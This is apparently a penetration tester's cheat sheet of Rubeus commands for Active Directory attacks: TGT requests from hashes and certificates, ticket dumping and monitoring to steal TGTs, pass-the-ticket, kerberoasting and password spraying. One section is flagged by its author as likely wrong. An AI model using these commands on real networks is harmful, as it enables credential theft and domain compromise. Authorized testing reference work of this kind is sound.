# Rubeus.exe [Rubeus](https://github.com/GhostPack/Rubeus) is wonderful for playing with hashes and Kerberos tickets. ## Request a TGT ``` rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap ``` :::tip Note: if doing `asktgt` for a machine account, be sure to use the trailing dollar sign, i.e. `DC01$` ::: ### Request a TGT with a pfx file (ESC1) You'd do this, for example, after abusing ESC1 or ESC8 with [certify.exe](/pentesting/Internal/certify). ``` Rubeus.exe asktgt /user:ad-user-you-chose-to-impersonate-with-certify.exe-command /certificate:cert.pfx /ptt ``` ### Request a TGT with a pfx file (ESC8) ``` certipy auth -pfx blah.pfx -domain domain.com rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap rubeus.exe ptt /ticket:THE-PTDC01-TGT-YOU-COPIED-TO-YOUR-CLIPBOARD-EARLIER ``` ### Request a TGT when abusing forest trusts [ UNDER REVIEW ] :::danger *I was working on this in a lab and don't think this section below is right, so ignore it until further review.* ::: If you're in a situation where you've got DA on DOMAIN2.COM and want to abuse that to pwn DOMAIN1.COM, and you've extracted domain SIDs with [get-adobject](/cmd/Windows/get-adobject) *and* you've extracted trust keys with [mimikatz](/pentesting/Internal/mimikatz), you can do something like this to request a TGT for the pwned domain: ``` rubeus.exe asktgt /user:domain2$ /domain:domain1.com /rc4:THE-rc4_hmac_nt-YOU-EXTRACTED-WITH-MIMIKATZ /nowrap ``` ## Dump tickets on a local machine ``` rubeus.exe dump /service:krbtgt /nowrap ``` ## Monitor mode on a local machine This is handy when you're WinRM'd into a box with local/domain admin creds and you want to steal other TGTs: ``` rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITOR ``` ### Monitor mode - save to disk If for some reason the TGTs won't write to registry, try this to write to disk: ``` rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:\users\public\some-innocent-looking-file.log" ``` ### Extracting TGTs from registry hives after monitor mode attack Once you've done the monitor "attack" and captured TGTs to the registry, use [reg.exe](/cmd/Windows/reg) to extract them: ``` reg export HKLM\SOFTWARE\MONITOR backup1.reg ``` :::tip Once you have the TGTs, use something like [rubeus2ccache](/pentesting/Internal/rubeus2ccache) to convert to `kirbi` or `ccache` ([reference](https://tw1sm.github.io/2021-02-01-kerberos-conversion/)). Then you can use [rubeus](/pentesting/Internal/rubeus) to pass the TGT. ::: ## Describe a ticket ``` rubeus.exe describe /ticket:base64ticket ``` This came in real handy during an engagement where I had lifted a TGT from a system and was trying to pass it and use it and was getting all sorts of errors. When I ran the `describe` command the output said `KeyType=180` which I learned means credential guard is in place and that ticket won't work anywhere else but the box it came from! ## Pass-the-ticket ``` rubeus.exe ptt /ticket:xxx ``` ## Kerberoasting attack ``` rubeus.exe kerberoast /simple /outfile:kerberoast.txt ``` ## Password spraying ``` rubeus.exe spray /password:MySprayedPass2024! /domain:domain.com /dc:1.2.3.4 /outfile:successful-sprays.txt ``` ### Password spraying (with passwords file) It's the same command above, except instead of `/password:SomePassword` you do: ``` /passwords:file-full-of-passwords.txt ```